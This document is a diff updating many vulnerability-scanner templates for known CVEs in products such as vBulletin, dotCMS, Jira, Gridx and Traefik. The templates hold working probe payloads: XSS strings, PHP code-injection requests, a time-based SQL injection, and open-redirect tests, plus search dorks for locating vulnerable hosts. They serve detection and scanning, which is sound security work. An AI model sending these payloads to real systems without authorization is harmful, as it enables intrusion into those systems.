@ -5,10 +5,11 @@ info:
|
|||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
|
||||
dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/dotCMS/core/issues/15286
|
||||
- https://www.cvedetails.com/cve/CVE-2018-17422
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17422
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -37,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2018-19287
|
||||
|
||||
info:
|
||||
name: Ninja Forms <= 3.3.17 - Cross-Site Scripting
|
||||
name: WordPress Ninja Forms <3.3.18 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
XSS in the Ninja Forms plugin before 3.3.18 for WordPress allows Remote Attackers to execute JavaScript.
|
||||
WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7
|
||||
- https://wordpress.org/plugins/ninja-forms/
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/17
|
||||
|
|
|
@ -78,4 +78,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/10/06
|
||||
# Enhanced by mp on 2022/10/07
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2018-6200
|
||||
|
||||
info:
|
||||
name: vBulletin 3.x.x & 4.2.x - Open Redirect
|
||||
name: vBulletin - Open Redirect
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
|
||||
vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://cxsecurity.com/issue/WLB-2018010251
|
||||
- https://www.cvedetails.com/cve/CVE-2018-6200
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-6200
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -27,9 +27,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- "4cc32a3a81d2bb37271934a48ce4468a"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-1010290
|
||||
|
||||
info:
|
||||
name: Babel - Open Redirection
|
||||
name: Babel - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
|
||||
description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
|
||||
reference:
|
||||
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
|
||||
- http://dev.cmsmadesimple.org/project/files/729
|
||||
|
@ -26,3 +26,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
id: CVE-2019-14223
|
||||
|
||||
info:
|
||||
name: Alfresco Share Open Redirect
|
||||
name: Alfresco Share - Open Redirect
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating
|
||||
the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.).
|
||||
description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D
|
||||
- https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-14223
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -32,3 +32,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-14696
|
||||
|
||||
info:
|
||||
name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
|
||||
name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-14696
|
||||
cwe-id: CWE-79
|
||||
tags: packetstorm,cve,cve2019,xss
|
||||
tags: xss,open-school,packetstorm,cve,cve2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -24,12 +24,19 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/08
|
||||
|
|
|
@ -15,7 +15,10 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-16759
|
||||
cwe-id: CWE-94
|
||||
tags: rce,kev,seclists,cve,cve2019,vbulletin
|
||||
metadata:
|
||||
shodan-query: http.component:"vBulletin"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,rce,kev,seclists,vbulletin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,15 +27,15 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "addcc9f9f2f40e2e6aca3079b73d9d17"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
|
||||
|
||||
# Enhanced by mp on 2022/03/29
|
||||
|
|
|
@ -1,21 +1,22 @@
|
|||
id: CVE-2019-18957
|
||||
|
||||
info:
|
||||
name: Microstrategy Library before 11.1.3 XSS
|
||||
name: MicroStrategy Library <11.1.3 - Cross-Site Scripting
|
||||
author: tess
|
||||
severity: medium
|
||||
description: |
|
||||
Microstrategy Library in MicroStrategy before 2019 before 11.1.3 has reflected XSS.
|
||||
MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18957
|
||||
- https://www.cvedetails.com/cve/CVE-2019-18957/
|
||||
- https://seclists.org/bugtraq/2019/Nov/23
|
||||
- https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
|
||||
remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-18957
|
||||
cwe-id: CWE-79
|
||||
tags: xss,seclists,cve,cve2019,microstrategy
|
||||
tags: cve2019,microstrategy,packetstorm,xss,seclists,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -37,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/18
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
|
||||
description: |
|
||||
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
|
||||
reference:
|
||||
- https://cinzinga.github.io/CVE-2019-19908/
|
||||
- http://ciprianmp.com/
|
||||
|
@ -15,20 +16,30 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-19908
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2019,xss,injection,javascript
|
||||
metadata:
|
||||
verified: true
|
||||
google-dork: inurl:"/plus/pass_reset.php"
|
||||
tags: cve,cve2019,phpMyChat,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'username = "</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -12,9 +12,10 @@ info:
|
|||
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-2729
|
||||
cwe-id: CWE-284
|
||||
tags: cve,cve2019,oracle,rce,weblogic
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Jira < 8.1.1 - Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
|
||||
description: |
|
||||
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
|
||||
reference:
|
||||
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
|
||||
- https://jira.atlassian.com/browse/JRASERVER-69243
|
||||
|
@ -15,6 +16,7 @@ info:
|
|||
cve-id: CVE-2019-3402
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.component:"Atlassian Jira"
|
||||
tags: cve,cve2019,atlassian,jira,xss
|
||||
|
||||
|
@ -25,12 +27,18 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'<script>alert(1)</script>' does not exist"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2019-3912
|
||||
|
||||
info:
|
||||
name: LabKey Server < 18.3.0 - Open Redirect
|
||||
name: LabKey Server Community Edition <18.3.0 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites.
|
||||
description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://www.cvedetails.com/cve/CVE-2019-3912
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -27,3 +28,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2019-7275
|
||||
|
||||
info:
|
||||
name: Open Redirect in Optergy Proton/Enterprise BMS
|
||||
name: Optergy Proton/Enterprise Building Management System - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Optergy Proton/Enterprise devices allow Open Redirect.
|
||||
description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
|
||||
- https://applied-risk.com/resources/ar-2019-008
|
||||
- https://cxsecurity.com/issue/WLB-2019110074
|
||||
- https://applied-risk.com/labs/advisories
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7275
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -27,3 +28,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2019-9915
|
||||
|
||||
info:
|
||||
name: GetSimpleCMS 3.3.13 - Open Redirection
|
||||
name: GetSimple CMS 3.3.13 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter.
|
||||
description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
|
||||
- https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
|
||||
- https://www.cvedetails.com/cve/CVE-2019-9915
|
||||
- https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9915
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -33,3 +34,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2020-13121
|
||||
|
||||
info:
|
||||
name: Submitty 20.04.01 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
|
||||
reference:
|
||||
- https://github.com/Submitty/Submitty/issues/5265
|
||||
- https://www.cvedetails.com/cve/CVE-2020-13121
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-13121
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,submitty,oos
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/authentication/login
|
||||
|
||||
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -21,13 +21,16 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/secure/ViewUserHover.jspa"
|
||||
- '{{BaseURL}}/secure/ViewUserHover.jspa'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "User does not exist"
|
||||
- 'User does not exist'
|
||||
- 'content="JIRA"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2020-15129
|
||||
|
||||
info:
|
||||
name: Open-redirect in Traefik
|
||||
name: Traefik - Open Redirect
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
|
||||
description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik
|
||||
- https://github.com/containous/traefik/releases/tag/v2.2.8
|
||||
- https://github.com/containous/traefik/pull/7109
|
||||
- https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-15129
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.7
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -5,16 +5,18 @@ info:
|
|||
author: piyushchhiroliya
|
||||
severity: high
|
||||
description: |
|
||||
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
|
||||
Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
|
||||
reference:
|
||||
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
|
||||
- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
|
||||
- http://www.openwall.com/lists/oss-security/2020/12/21/1
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
|
||||
remediation: Change default value for [webserver] secret_key config.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.7
|
||||
cve-id: CVE-2020-17526
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
fofa-query: Apache Airflow
|
||||
verified: "true"
|
||||
|
@ -49,3 +51,5 @@ requests:
|
|||
- "contains(body_1, 'Redirecting...')"
|
||||
- "status_code_1 == 302"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/10/19
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2020-18268
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP 1.5.2 - Open Redirect
|
||||
name: Z-Blog <=1.5.2 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
|
||||
description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/zblogcn/zblogphp/issues/216
|
||||
- https://www.cvedetails.com/cve/CVE-2020-18268
|
||||
- https://github.com/zblogcn/zblogphp/issues/209
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-18268
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -37,3 +38,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -7,9 +7,9 @@ info:
|
|||
description: |
|
||||
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
|
||||
reference:
|
||||
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
|
||||
- https://github.com/oria/gridx/issues/433
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
|
||||
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -19,23 +19,18 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
|
||||
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "6ca86c2c17047c14437f55c42c801c10"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
|
||||
|
||||
# Enhanced by mp on 2022/04/27
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2020-20285
|
||||
|
||||
info:
|
||||
name: zzcms - Reflected XSS
|
||||
name: ZZcms - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
|
||||
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
|
||||
reference:
|
||||
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/17
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2020-21012
|
||||
|
||||
info:
|
||||
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.
|
||||
reference:
|
||||
- https://github.com/hitIer/web_test/tree/master/hotel
|
||||
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-21012
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,hotel,sqli,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /forgot_password.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
btn_forgot=1&email=1%27%20or%20sleep(6)%23
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "Hotel Booking System")'
|
||||
condition: and
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2020-22840
|
||||
|
||||
info:
|
||||
name: b2evolution CMS - Open Redirect
|
||||
name: b2evolution CMS <6.11.6 - Open Redirect
|
||||
author: geeknik
|
||||
